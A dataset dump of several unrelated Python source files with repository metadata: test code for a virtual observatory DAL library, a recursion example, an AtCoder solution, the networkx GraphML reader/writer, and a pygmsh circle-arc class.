self.assertEquals("fits", dalq.mime2extension("application/fits"))
self.assertEquals("fits", dalq.mime2extension("image/fits"))
self.assertEquals("fits", dalq.mime2extension("image/x-fits"))
self.assertEquals("jpg", dalq.mime2extension("image/jpeg"))
self.assertEquals("gif", dalq.mime2extension("image/gif"))
self.assertEquals("png", dalq.mime2extension("image/png"))
self.assertEquals("txt", dalq.mime2extension("text/plain"))
self.assertEquals("html", dalq.mime2extension("text/html"))
self.assertEquals("xml", dalq.mime2extension("text/xml"))
self.assertEquals("xml", dalq.mime2extension("application/votable;convention=stsci"))
self.assertEquals("xml", dalq.mime2extension("application/x-votable"))
self.assertEquals("xml", dalq.mime2extension("application/votable"))
self.assertEquals("xls",
dalq.mime2extension("application/x-micrsoft-spreadsheet", "xls"))
def testSuggest(self):
self.assertEquals("dataset", self.rec.suggest_dataset_basename())
self.assertEquals("DAT", self.rec.suggest_extension("DAT"))
def testMakeDatasetName(self):
self.assertEquals("./dataset.dat", self.rec.make_dataset_filename())
self.assertEquals("./goober.dat",
self.rec.make_dataset_filename(base="goober"))
self.assertEquals("./dataset.fits",
self.rec.make_dataset_filename(ext="fits"))
self.assertEquals("./goober.fits",
self.rec.make_dataset_filename(base="goober",
ext="fits"))
self.assertEquals(testdir+"/dataset.dat",
self.rec.make_dataset_filename(testdir))
path = os.path.join(testdir,self.base+".dat")
self.assertFalse(os.path.exists(path))
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
open(path,'w').close()
self.assertTrue(os.path.exists(path))
path = os.path.join(testdir,self.base+"-1.dat")
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
open(path,'w').close()
self.assertTrue(os.path.exists(path))
path = os.path.join(testdir,self.base+"-2.dat")
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
open(path,'w').close()
self.assertTrue(os.path.exists(path))
path = os.path.join(testdir,self.base+"-3.dat")
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
self.cleanfiles()
open(os.path.join(testdir,self.base+".dat"),'w').close()
path = os.path.join(testdir,self.base+"-1.dat")
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
open(os.path.join(testdir,self.base+"-1.dat"),'w').close()
open(os.path.join(testdir,self.base+"-2.dat"),'w').close()
open(os.path.join(testdir,self.base+"-3.dat"),'w').close()
path = os.path.join(testdir,self.base+"-4.dat")
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
self.cleanfiles()
self.assertEquals(os.path.join(testdir,self.base+".dat"),
self.rec.make_dataset_filename(testdir, self.base))
__all__ = "DALAccessErrorTest DALServiceErrorTest DALQueryErrorTest RecordTest EnsureBaseURLTest DALServiceTest DALQueryTest QueryExecuteTest CursorTest DatasetNameTest".split()
def suite():
tests = []
for t in __all__:
tests.append(unittest.makeSuite(globals()[t]))
return unittest.TestSuite(tests)
if __name__ == "__main__":
srvr = testserver.TestServer(testserverport)
try:
srvr.start()
unittest.main()
finally:
if srvr.isAlive():
srvr.shutdown()
| [
"usvirtualobservatory@5a1e9bf7-f4d4-f7d4-5b89-e7d39643c4b5"
] | usvirtualobservatory@5a1e9bf7-f4d4-f7d4-5b89-e7d39643c4b5 |
b6d8f27ccd78ce668ead8011086bf2b955637496 | 67932bfe656c093cc306d4c9bca682140d21a470 | /loopsByRecursion.py | 06f6799b5a153b5acb0049b7e7e2968688365091 | [] | no_license | dases/recursion_examples | bb8769c0f64ef8e612660547c00693ede725f72f | 3733045157d0daf5016e0213eeace8f968203311 | refs/heads/master | 2023-07-16T05:46:51.521638 | 2021-09-01T21:27:34 | 2021-09-01T21:27:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | def theLoop(i):
if i < 4: # Stops when false.
# RECURSIVE CASE
# The main code:
print(i, 'Hello!')
theLoop(i + 1) # Increment i.
return
else:
# BASE CASE
return
theLoop(0) # Start i at 0. | [
"[email protected]"
] | |
83bf67157c94ca91dcfad4370e48441432eeff06 | 3de2a746243ad1cb000994a06a0f9699db9a901f | /abc083b.py | 25f54f5c86bcc9984b5f3c4dbc00bddd018005eb | [] | no_license | takumi152/atcoder | 71d726ffdf2542d8abac0d9817afaff911db7c6c | ebac94f1227974aa2e6bf372e18605518de46441 | refs/heads/master | 2022-10-30T12:14:41.742596 | 2022-09-29T19:49:32 | 2022-09-29T19:49:32 | 181,502,518 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 386 | py |
def main():
buf = input()
buflist = buf.split()
N = int(buflist[0])
A = int(buflist[1])
B = int(buflist[2])
sum = 0
for i in range(1, N + 1):
count = 0
for d in [int(d) for d in str(i)]:
count += d
if count >= A and count <= B:
sum += i
print(sum)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
ab4543f40cd972aedbc022fa7146b96e31d0acb6 | 853d4cec42071b76a80be38c58ffe0fbf9b9dc34 | /venv/Lib/site-packages/networkx/readwrite/graphml.py | e732e75ebcf81e1438ca3a072c6ff5c70d2f61f3 | [] | no_license | msainTesting/TwitterAnalysis | 5e1646dbf40badf887a86e125ef30a9edaa622a4 | b1204346508ba3e3922a52380ead5a8f7079726b | refs/heads/main | 2023-08-28T08:29:28.924620 | 2021-11-04T12:36:30 | 2021-11-04T12:36:30 | 424,242,582 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,908 | py | """
*******
GraphML
*******
Read and write graphs in GraphML format.
This implementation does not support mixed graphs (directed and unidirected
edges together), hyperedges, nested graphs, or ports.
"GraphML is a comprehensive and easy-to-use file format for graphs. It
consists of a language core to describe the structural properties of a
graph and a flexible extension mechanism to add application-specific
data. Its main features include support of
* directed, undirected, and mixed graphs,
* hypergraphs,
* hierarchical graphs,
* graphical representations,
* references to external data,
* application-specific attribute data, and
* light-weight parsers.
Unlike many other file formats for graphs, GraphML does not use a
custom syntax. Instead, it is based on XML and hence ideally suited as
a common denominator for all kinds of services generating, archiving,
or processing graphs."
http://graphml.graphdrawing.org/
Format
------
GraphML is an XML format. See
http://graphml.graphdrawing.org/specification.html for the specification and
http://graphml.graphdrawing.org/primer/graphml-primer.html
for examples.
"""
import warnings
from collections import defaultdict
from xml.etree.ElementTree import Element, ElementTree, tostring, fromstring
try:
import lxml.etree as lxmletree
except ImportError:
lxmletree = None
import networkx as nx
from networkx.utils import open_file
__all__ = [
"write_graphml",
"read_graphml",
"generate_graphml",
"write_graphml_xml",
"write_graphml_lxml",
"parse_graphml",
"GraphMLWriter",
"GraphMLReader",
]
@open_file(1, mode="wb")
def write_graphml_xml(
G,
path,
encoding="utf-8",
prettyprint=True,
infer_numeric_types=False,
named_key_ids=False,
):
"""Write G in GraphML XML format to path
Parameters
----------
G : graph
A networkx graph
path : file or string
File or filename to write.
Filenames ending in .gz or .bz2 will be compressed.
encoding : string (optional)
Encoding for text data.
prettyprint : bool (optional)
If True use line breaks and indenting in output XML.
infer_numeric_types : boolean
Determine if numeric types should be generalized.
For example, if edges have both int and float 'weight' attributes,
we infer in GraphML that both are floats.
named_key_ids : bool (optional)
If True use attr.name as value for key elements' id attribute.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.write_graphml(G, "test.graphml")
Notes
-----
This implementation does not support mixed graphs (directed
and unidirected edges together) hyperedges, nested graphs, or ports.
"""
writer = GraphMLWriter(
encoding=encoding,
prettyprint=prettyprint,
infer_numeric_types=infer_numeric_types,
named_key_ids=named_key_ids,
)
writer.add_graph_element(G)
writer.dump(path)
@open_file(1, mode="wb")
def write_graphml_lxml(
G,
path,
encoding="utf-8",
prettyprint=True,
infer_numeric_types=False,
named_key_ids=False,
):
"""Write G in GraphML XML format to path
This function uses the LXML framework and should be faster than
the version using the xml library.
Parameters
----------
G : graph
A networkx graph
path : file or string
File or filename to write.
Filenames ending in .gz or .bz2 will be compressed.
encoding : string (optional)
Encoding for text data.
prettyprint : bool (optional)
If True use line breaks and indenting in output XML.
infer_numeric_types : boolean
Determine if numeric types should be generalized.
For example, if edges have both int and float 'weight' attributes,
we infer in GraphML that both are floats.
named_key_ids : bool (optional)
If True use attr.name as value for key elements' id attribute.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.write_graphml_lxml(G, "fourpath.graphml") # doctest: +SKIP
Notes
-----
This implementation does not support mixed graphs (directed
and unidirected edges together) hyperedges, nested graphs, or ports.
"""
writer = GraphMLWriterLxml(
path,
graph=G,
encoding=encoding,
prettyprint=prettyprint,
infer_numeric_types=infer_numeric_types,
named_key_ids=named_key_ids,
)
writer.dump()
def generate_graphml(G, encoding="utf-8", prettyprint=True, named_key_ids=False):
"""Generate GraphML lines for G
Parameters
----------
G : graph
A networkx graph
encoding : string (optional)
Encoding for text data.
prettyprint : bool (optional)
If True use line breaks and indenting in output XML.
named_key_ids : bool (optional)
If True use attr.name as value for key elements' id attribute.
Examples
--------
>>> G = nx.path_graph(4)
>>> linefeed = chr(10) # linefeed = \n
>>> s = linefeed.join(nx.generate_graphml(G)) # doctest: +SKIP
>>> for line in nx.generate_graphml(G): # doctest: +SKIP
... print(line)
Notes
-----
This implementation does not support mixed graphs (directed and unidirected
edges together) hyperedges, nested graphs, or ports.
"""
writer = GraphMLWriter(
encoding=encoding, prettyprint=prettyprint, named_key_ids=named_key_ids
)
writer.add_graph_element(G)
yield from str(writer).splitlines()
@open_file(0, mode="rb")
def read_graphml(path, node_type=str, edge_key_type=int, force_multigraph=False):
"""Read graph in GraphML format from path.
Parameters
----------
path : file or string
File or filename to write.
Filenames ending in .gz or .bz2 will be compressed.
node_type: Python type (default: str)
Convert node ids to this type
edge_key_type: Python type (default: int)
Convert graphml edge ids to this type. Multigraphs use id as edge key.
Non-multigraphs add to edge attribute dict with name "id".
force_multigraph : bool (default: False)
If True, return a multigraph with edge keys. If False (the default)
return a multigraph when multiedges are in the graph.
Returns
-------
graph: NetworkX graph
If parallel edges are present or `force_multigraph=True` then
a MultiGraph or MultiDiGraph is returned. Otherwise a Graph/DiGraph.
The returned graph is directed if the file indicates it should be.
Notes
-----
Default node and edge attributes are not propagated to each node and edge.
They can be obtained from `G.graph` and applied to node and edge attributes
if desired using something like this:
>>> default_color = G.graph["node_default"]["color"] # doctest: +SKIP
>>> for node, data in G.nodes(data=True): # doctest: +SKIP
... if "color" not in data:
... data["color"] = default_color
>>> default_color = G.graph["edge_default"]["color"] # doctest: +SKIP
>>> for u, v, data in G.edges(data=True): # doctest: +SKIP
... if "color" not in data:
... data["color"] = default_color
This implementation does not support mixed graphs (directed and unidirected
edges together), hypergraphs, nested graphs, or ports.
For multigraphs the GraphML edge "id" will be used as the edge
key. If not specified then they "key" attribute will be used. If
there is no "key" attribute a default NetworkX multigraph edge key
will be provided.
Files with the yEd "yfiles" extension will can be read but the graphics
information is discarded.
yEd compressed files ("file.graphmlz" extension) can be read by renaming
the file to "file.graphml.gz".
"""
reader = GraphMLReader(node_type, edge_key_type, force_multigraph)
# need to check for multiple graphs
glist = list(reader(path=path))
if len(glist) == 0:
# If no graph comes back, try looking for an incomplete header
header = b'<graphml xmlns="http://graphml.graphdrawing.org/xmlns">'
path.seek(0)
old_bytes = path.read()
new_bytes = old_bytes.replace(b"<graphml>", header)
glist = list(reader(string=new_bytes))
if len(glist) == 0:
raise nx.NetworkXError("file not successfully read as graphml")
return glist[0]
def parse_graphml(
graphml_string, node_type=str, edge_key_type=int, force_multigraph=False
):
"""Read graph in GraphML format from string.
Parameters
----------
graphml_string : string
String containing graphml information
(e.g., contents of a graphml file).
node_type: Python type (default: str)
Convert node ids to this type
edge_key_type: Python type (default: int)
Convert graphml edge ids to this type. Multigraphs use id as edge key.
Non-multigraphs add to edge attribute dict with name "id".
force_multigraph : bool (default: False)
If True, return a multigraph with edge keys. If False (the default)
return a multigraph when multiedges are in the graph.
Returns
-------
graph: NetworkX graph
If no parallel edges are found a Graph or DiGraph is returned.
Otherwise a MultiGraph or MultiDiGraph is returned.
Examples
--------
>>> G = nx.path_graph(4)
>>> linefeed = chr(10) # linefeed = \n
>>> s = linefeed.join(nx.generate_graphml(G))
>>> H = nx.parse_graphml(s)
Notes
-----
Default node and edge attributes are not propagated to each node and edge.
They can be obtained from `G.graph` and applied to node and edge attributes
if desired using something like this:
>>> default_color = G.graph["node_default"]["color"] # doctest: +SKIP
>>> for node, data in G.nodes(data=True): # doctest: +SKIP
... if "color" not in data:
... data["color"] = default_color
>>> default_color = G.graph["edge_default"]["color"] # doctest: +SKIP
>>> for u, v, data in G.edges(data=True): # doctest: +SKIP
... if "color" not in data:
... data["color"] = default_color
This implementation does not support mixed graphs (directed and unidirected
edges together), hypergraphs, nested graphs, or ports.
For multigraphs the GraphML edge "id" will be used as the edge
key. If not specified then they "key" attribute will be used. If
there is no "key" attribute a default NetworkX multigraph edge key
will be provided.
"""
reader = GraphMLReader(node_type, edge_key_type, force_multigraph)
# need to check for multiple graphs
glist = list(reader(string=graphml_string))
if len(glist) == 0:
# If no graph comes back, try looking for an incomplete header
header = '<graphml xmlns="http://graphml.graphdrawing.org/xmlns">'
new_string = graphml_string.replace("<graphml>", header)
glist = list(reader(string=new_string))
if len(glist) == 0:
raise nx.NetworkXError("file not successfully read as graphml")
return glist[0]
class GraphML:
NS_GRAPHML = "http://graphml.graphdrawing.org/xmlns"
NS_XSI = "http://www.w3.org/2001/XMLSchema-instance"
# xmlns:y="http://www.yworks.com/xml/graphml"
NS_Y = "http://www.yworks.com/xml/graphml"
SCHEMALOCATION = " ".join(
[
"http://graphml.graphdrawing.org/xmlns",
"http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd",
]
)
types = [
(int, "integer"), # for Gephi GraphML bug
(str, "yfiles"),
(str, "string"),
(int, "int"),
(float, "float"),
(float, "double"),
(bool, "boolean"),
]
# These additions to types allow writing numpy types
try:
import numpy as np
except:
pass
else:
# prepend so that python types are created upon read (last entry wins)
types = [
(np.float64, "float"),
(np.float32, "float"),
(np.float16, "float"),
(np.float_, "float"),
(np.int_, "int"),
(np.int8, "int"),
(np.int16, "int"),
(np.int32, "int"),
(np.int64, "int"),
(np.uint8, "int"),
(np.uint16, "int"),
(np.uint32, "int"),
(np.uint64, "int"),
(np.int_, "int"),
(np.intc, "int"),
(np.intp, "int"),
] + types
xml_type = dict(types)
python_type = dict(reversed(a) for a in types)
# This page says that data types in GraphML follow Java(TM).
# http://graphml.graphdrawing.org/primer/graphml-primer.html#AttributesDefinition
# true and false are the only boolean literals:
# http://en.wikibooks.org/wiki/Java_Programming/Literals#Boolean_Literals
convert_bool = {
# We use data.lower() in actual use.
"true": True,
"false": False,
# Include integer strings for convenience.
"0": False,
0: False,
"1": True,
1: True,
}
class GraphMLWriter(GraphML):
def __init__(
self,
graph=None,
encoding="utf-8",
prettyprint=True,
infer_numeric_types=False,
named_key_ids=False,
):
self.myElement = Element
self.infer_numeric_types = infer_numeric_types
self.prettyprint = prettyprint
self.named_key_ids = named_key_ids
self.encoding = encoding
self.xml = self.myElement(
"graphml",
{
"xmlns": self.NS_GRAPHML,
"xmlns:xsi": self.NS_XSI,
"xsi:schemaLocation": self.SCHEMALOCATION,
},
)
self.keys = {}
self.attributes = defaultdict(list)
self.attribute_types = defaultdict(set)
if graph is not None:
self.add_graph_element(graph)
def __str__(self):
if self.prettyprint:
self.indent(self.xml)
s = tostring(self.xml).decode(self.encoding)
return s
def attr_type(self, name, scope, value):
"""Infer the attribute type of data named name. Currently this only
supports inference of numeric types.
If self.infer_numeric_types is false, type is used. Otherwise, pick the
most general of types found across all values with name and scope. This
means edges with data named 'weight' are treated separately from nodes
with data named 'weight'.
"""
if self.infer_numeric_types:
types = self.attribute_types[(name, scope)]
if len(types) > 1:
types = {self.xml_type[t] for t in types}
if "string" in types:
return str
elif "float" in types or "double" in types:
return float
else:
return int
else:
return list(types)[0]
else:
return type(value)
def get_key(self, name, attr_type, scope, default):
keys_key = (name, attr_type, scope)
try:
return self.keys[keys_key]
except KeyError:
if self.named_key_ids:
new_id = name
else:
new_id = f"d{len(list(self.keys))}"
self.keys[keys_key] = new_id
key_kwargs = {
"id": new_id,
"for": scope,
"attr.name": name,
"attr.type": attr_type,
}
key_element = self.myElement("key", **key_kwargs)
# add subelement for data default value if present
if default is not None:
default_element = self.myElement("default")
default_element.text = str(default)
key_element.append(default_element)
self.xml.insert(0, key_element)
return new_id
def add_data(self, name, element_type, value, scope="all", default=None):
"""
Make a data element for an edge or a node. Keep a log of the
type in the keys table.
"""
if element_type not in self.xml_type:
msg = f"GraphML writer does not support {element_type} as data values."
raise nx.NetworkXError(msg)
keyid = self.get_key(name, self.xml_type[element_type], scope, default)
data_element = self.myElement("data", key=keyid)
data_element.text = str(value)
return data_element
def add_attributes(self, scope, xml_obj, data, default):
"""Appends attribute data to edges or nodes, and stores type information
to be added later. See add_graph_element.
"""
for k, v in data.items():
self.attribute_types[(str(k), scope)].add(type(v))
self.attributes[xml_obj].append([k, v, scope, default.get(k)])
def add_nodes(self, G, graph_element):
default = G.graph.get("node_default", {})
for node, data in G.nodes(data=True):
node_element = self.myElement("node", id=str(node))
self.add_attributes("node", node_element, data, default)
graph_element.append(node_element)
def add_edges(self, G, graph_element):
if G.is_multigraph():
for u, v, key, data in G.edges(data=True, keys=True):
edge_element = self.myElement(
"edge", source=str(u), target=str(v), id=str(key)
)
default = G.graph.get("edge_default", {})
self.add_attributes("edge", edge_element, data, default)
graph_element.append(edge_element)
else:
for u, v, data in G.edges(data=True):
edge_element = self.myElement("edge", source=str(u), target=str(v))
default = G.graph.get("edge_default", {})
self.add_attributes("edge", edge_element, data, default)
graph_element.append(edge_element)
def add_graph_element(self, G):
"""
Serialize graph G in GraphML to the stream.
"""
if G.is_directed():
default_edge_type = "directed"
else:
default_edge_type = "undirected"
graphid = G.graph.pop("id", None)
if graphid is None:
graph_element = self.myElement("graph", edgedefault=default_edge_type)
else:
graph_element = self.myElement(
"graph", edgedefault=default_edge_type, id=graphid
)
default = {}
data = {
k: v
for (k, v) in G.graph.items()
if k not in ["node_default", "edge_default"]
}
self.add_attributes("graph", graph_element, data, default)
self.add_nodes(G, graph_element)
self.add_edges(G, graph_element)
# self.attributes contains a mapping from XML Objects to a list of
# data that needs to be added to them.
# We postpone processing in order to do type inference/generalization.
# See self.attr_type
for (xml_obj, data) in self.attributes.items():
for (k, v, scope, default) in data:
xml_obj.append(
self.add_data(
str(k), self.attr_type(k, scope, v), str(v), scope, default
)
)
self.xml.append(graph_element)
def add_graphs(self, graph_list):
""" Add many graphs to this GraphML document. """
for G in graph_list:
self.add_graph_element(G)
def dump(self, stream):
if self.prettyprint:
self.indent(self.xml)
document = ElementTree(self.xml)
document.write(stream, encoding=self.encoding, xml_declaration=True)
def indent(self, elem, level=0):
# in-place prettyprint formatter
i = "\n" + level * " "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
self.indent(elem, level + 1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
class IncrementalElement:
"""Wrapper for _IncrementalWriter providing an Element like interface.
This wrapper does not intend to be a complete implementation but rather to
deal with those calls used in GraphMLWriter.
"""
def __init__(self, xml, prettyprint):
self.xml = xml
self.prettyprint = prettyprint
def append(self, element):
self.xml.write(element, pretty_print=self.prettyprint)
class GraphMLWriterLxml(GraphMLWriter):
def __init__(
self,
path,
graph=None,
encoding="utf-8",
prettyprint=True,
infer_numeric_types=False,
named_key_ids=False,
):
self.myElement = lxmletree.Element
self._encoding = encoding
self._prettyprint = prettyprint
self.named_key_ids = named_key_ids
self.infer_numeric_types = infer_numeric_types
self._xml_base = lxmletree.xmlfile(path, encoding=encoding)
self._xml = self._xml_base.__enter__()
self._xml.write_declaration()
# We need to have a xml variable that support insertion. This call is
# used for adding the keys to the document.
# We will store those keys in a plain list, and then after the graph
# element is closed we will add them to the main graphml element.
self.xml = []
self._keys = self.xml
self._graphml = self._xml.element(
"graphml",
{
"xmlns": self.NS_GRAPHML,
"xmlns:xsi": self.NS_XSI,
"xsi:schemaLocation": self.SCHEMALOCATION,
},
)
self._graphml.__enter__()
self.keys = {}
self.attribute_types = defaultdict(set)
if graph is not None:
self.add_graph_element(graph)
def add_graph_element(self, G):
"""
Serialize graph G in GraphML to the stream.
"""
if G.is_directed():
default_edge_type = "directed"
else:
default_edge_type = "undirected"
graphid = G.graph.pop("id", None)
if graphid is None:
graph_element = self._xml.element("graph", edgedefault=default_edge_type)
else:
graph_element = self._xml.element(
"graph", edgedefault=default_edge_type, id=graphid
)
# gather attributes types for the whole graph
# to find the most general numeric format needed.
# Then pass through attributes to create key_id for each.
graphdata = {
k: v
for k, v in G.graph.items()
if k not in ("node_default", "edge_default")
}
node_default = G.graph.get("node_default", {})
edge_default = G.graph.get("edge_default", {})
# Graph attributes
for k, v in graphdata.items():
self.attribute_types[(str(k), "graph")].add(type(v))
for k, v in graphdata.items():
element_type = self.xml_type[self.attr_type(k, "graph", v)]
self.get_key(str(k), element_type, "graph", None)
# Nodes and data
for node, d in G.nodes(data=True):
for k, v in d.items():
self.attribute_types[(str(k), "node")].add(type(v))
for node, d in G.nodes(data=True):
for k, v in d.items():
T = self.xml_type[self.attr_type(k, "node", v)]
self.get_key(str(k), T, "node", node_default.get(k))
# Edges and data
if G.is_multigraph():
for u, v, ekey, d in G.edges(keys=True, data=True):
for k, v in d.items():
self.attribute_types[(str(k), "edge")].add(type(v))
for u, v, ekey, d in G.edges(keys=True, data=True):
for k, v in d.items():
T = self.xml_type[self.attr_type(k, "edge", v)]
self.get_key(str(k), T, "edge", edge_default.get(k))
else:
for u, v, d in G.edges(data=True):
for k, v in d.items():
self.attribute_types[(str(k), "edge")].add(type(v))
for u, v, d in G.edges(data=True):
for k, v in d.items():
T = self.xml_type[self.attr_type(k, "edge", v)]
self.get_key(str(k), T, "edge", edge_default.get(k))
# Now add attribute keys to the xml file
for key in self.xml:
self._xml.write(key, pretty_print=self._prettyprint)
# The incremental_writer writes each node/edge as it is created
incremental_writer = IncrementalElement(self._xml, self._prettyprint)
with graph_element:
self.add_attributes("graph", incremental_writer, graphdata, {})
self.add_nodes(G, incremental_writer) # adds attributes too
self.add_edges(G, incremental_writer) # adds attributes too
def add_attributes(self, scope, xml_obj, data, default):
"""Appends attribute data."""
for k, v in data.items():
data_element = self.add_data(
str(k), self.attr_type(str(k), scope, v), str(v), scope, default.get(k)
)
xml_obj.append(data_element)
def __str__(self):
return object.__str__(self)
def dump(self):
self._graphml.__exit__(None, None, None)
self._xml_base.__exit__(None, None, None)
# Choose a writer function for default
if lxmletree is None:
write_graphml = write_graphml_xml
else:
write_graphml = write_graphml_lxml
class GraphMLReader(GraphML):
"""Read a GraphML document. Produces NetworkX graph objects."""
def __init__(self, node_type=str, edge_key_type=int, force_multigraph=False):
self.node_type = node_type
self.edge_key_type = edge_key_type
self.multigraph = force_multigraph # If False, test for multiedges
self.edge_ids = {} # dict mapping (u,v) tuples to edge id attributes
def __call__(self, path=None, string=None):
if path is not None:
self.xml = ElementTree(file=path)
elif string is not None:
self.xml = fromstring(string)
else:
raise ValueError("Must specify either 'path' or 'string' as kwarg")
(keys, defaults) = self.find_graphml_keys(self.xml)
for g in self.xml.findall(f"{{{self.NS_GRAPHML}}}graph"):
yield self.make_graph(g, keys, defaults)
def make_graph(self, graph_xml, graphml_keys, defaults, G=None):
# set default graph type
edgedefault = graph_xml.get("edgedefault", None)
if G is None:
if edgedefault == "directed":
G = nx.MultiDiGraph()
else:
G = nx.MultiGraph()
# set defaults for graph attributes
G.graph["node_default"] = {}
G.graph["edge_default"] = {}
for key_id, value in defaults.items():
key_for = graphml_keys[key_id]["for"]
name = graphml_keys[key_id]["name"]
python_type = graphml_keys[key_id]["type"]
if key_for == "node":
G.graph["node_default"].update({name: python_type(value)})
if key_for == "edge":
G.graph["edge_default"].update({name: python_type(value)})
# hyperedges are not supported
hyperedge = graph_xml.find(f"{{{self.NS_GRAPHML}}}hyperedge")
if hyperedge is not None:
raise nx.NetworkXError("GraphML reader doesn't support hyperedges")
# add nodes
for node_xml in graph_xml.findall(f"{{{self.NS_GRAPHML}}}node"):
self.add_node(G, node_xml, graphml_keys, defaults)
# add edges
for edge_xml in graph_xml.findall(f"{{{self.NS_GRAPHML}}}edge"):
self.add_edge(G, edge_xml, graphml_keys)
# add graph data
data = self.decode_data_elements(graphml_keys, graph_xml)
G.graph.update(data)
# switch to Graph or DiGraph if no parallel edges were found
if self.multigraph:
return G
G = nx.DiGraph(G) if G.is_directed() else nx.Graph(G)
# add explicit edge "id" from file as attribute in NX graph.
nx.set_edge_attributes(G, values=self.edge_ids, name="id")
return G
def add_node(self, G, node_xml, graphml_keys, defaults):
"""Add a node to the graph.
"""
# warn on finding unsupported ports tag
ports = node_xml.find(f"{{{self.NS_GRAPHML}}}port")
if ports is not None:
warnings.warn("GraphML port tag not supported.")
# find the node by id and cast it to the appropriate type
node_id = self.node_type(node_xml.get("id"))
# get data/attributes for node
data = self.decode_data_elements(graphml_keys, node_xml)
G.add_node(node_id, **data)
# get child nodes
if node_xml.attrib.get("yfiles.foldertype") == "group":
graph_xml = node_xml.find(f"{{{self.NS_GRAPHML}}}graph")
self.make_graph(graph_xml, graphml_keys, defaults, G)
def add_edge(self, G, edge_element, graphml_keys):
"""Add an edge to the graph.
"""
# warn on finding unsupported ports tag
ports = edge_element.find(f"{{{self.NS_GRAPHML}}}port")
if ports is not None:
warnings.warn("GraphML port tag not supported.")
# raise error if we find mixed directed and undirected edges
directed = edge_element.get("directed")
if G.is_directed() and directed == "false":
msg = "directed=false edge found in directed graph."
raise nx.NetworkXError(msg)
if (not G.is_directed()) and directed == "true":
msg = "directed=true edge found in undirected graph."
raise nx.NetworkXError(msg)
source = self.node_type(edge_element.get("source"))
target = self.node_type(edge_element.get("target"))
data = self.decode_data_elements(graphml_keys, edge_element)
# GraphML stores edge ids as an attribute
# NetworkX uses them as keys in multigraphs too if no key
# attribute is specified
edge_id = edge_element.get("id")
if edge_id:
# self.edge_ids is used by `make_graph` method for non-multigraphs
self.edge_ids[source, target] = edge_id
try:
edge_id = self.edge_key_type(edge_id)
except ValueError: # Could not convert.
pass
else:
edge_id = data.get("key")
if G.has_edge(source, target):
# mark this as a multigraph
self.multigraph = True
# Use add_edges_from to avoid error with add_edge when `'key' in data`
# Note there is only one edge here...
G.add_edges_from([(source, target, edge_id, data)])
def decode_data_elements(self, graphml_keys, obj_xml):
"""Use the key information to decode the data XML if present."""
data = {}
for data_element in obj_xml.findall(f"{{{self.NS_GRAPHML}}}data"):
key = data_element.get("key")
try:
data_name = graphml_keys[key]["name"]
data_type = graphml_keys[key]["type"]
except KeyError as e:
raise nx.NetworkXError(f"Bad GraphML data: no key {key}") from e
text = data_element.text
# assume anything with subelements is a yfiles extension
if text is not None and len(list(data_element)) == 0:
if data_type == bool:
# Ignore cases.
# http://docs.oracle.com/javase/6/docs/api/java/lang/
# Boolean.html#parseBoolean%28java.lang.String%29
data[data_name] = self.convert_bool[text.lower()]
else:
data[data_name] = data_type(text)
elif len(list(data_element)) > 0:
# Assume yfiles as subelements, try to extract node_label
node_label = None
for node_type in ["ShapeNode", "SVGNode", "ImageNode"]:
pref = f"{{{self.NS_Y}}}{node_type}/{{{self.NS_Y}}}"
geometry = data_element.find(f"{pref}Geometry")
if geometry is not None:
data["x"] = geometry.get("x")
data["y"] = geometry.get("y")
if node_label is None:
node_label = data_element.find(f"{pref}NodeLabel")
if node_label is not None:
data["label"] = node_label.text
# check all the different types of edges avaivable in yEd.
for e in [
"PolyLineEdge",
"SplineEdge",
"QuadCurveEdge",
"BezierEdge",
"ArcEdge",
]:
pref = f"{{{self.NS_Y}}}{e}/{{{self.NS_Y}}}"
edge_label = data_element.find(f"{pref}EdgeLabel")
if edge_label is not None:
break
if edge_label is not None:
data["label"] = edge_label.text
return data
def find_graphml_keys(self, graph_element):
"""Extracts all the keys and key defaults from the xml.
"""
graphml_keys = {}
graphml_key_defaults = {}
for k in graph_element.findall(f"{{{self.NS_GRAPHML}}}key"):
attr_id = k.get("id")
attr_type = k.get("attr.type")
attr_name = k.get("attr.name")
yfiles_type = k.get("yfiles.type")
if yfiles_type is not None:
attr_name = yfiles_type
attr_type = "yfiles"
if attr_type is None:
attr_type = "string"
warnings.warn(f"No key type for id {attr_id}. Using string")
if attr_name is None:
raise nx.NetworkXError(f"Unknown key for id {attr_id}.")
graphml_keys[attr_id] = {
"name": attr_name,
"type": self.python_type[attr_type],
"for": k.get("for"),
}
# check for "default" subelement of key element
default = k.find(f"{{{self.NS_GRAPHML}}}default")
if default is not None:
graphml_key_defaults[attr_id] = default.text
return graphml_keys, graphml_key_defaults
| [
"[email protected]"
] | |
0442dccb71f8076d97bd44918f3116cd9633224c | 75fe89a5ca7ceb91757199c4dde6fd20a69c94b9 | /pygmsh/circle_arc.py | 527ec58c5c88de3903e536d467a0c54bbda050b0 | [
"MIT"
] | permissive | guifon1000/pygmsh | 39d1c1d3e890f64afa94e35e6da4e0c6967d3373 | ce6bf8f080c359b1ab81c9d1adee6a81d3419d51 | refs/heads/master | 2021-01-22T23:53:42.835887 | 2017-03-20T13:45:53 | 2017-03-20T13:45:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 488 | py | # -*- coding: utf-8 -*-
#
from .line_base import LineBase
from .point import Point
class CircleArc(LineBase):
def __init__(self, points):
super(CircleArc, self).__init__()
for p in points:
assert isinstance(p, Point)
self.points = points
self.code = '\n'.join([
'%s = newl;' % self.id,
'Circle(%s) = {%s, %s, %s};'
% (self.id, points[0].id, points[1].id, points[2].id)
])
return
| [
"[email protected]"
] | |
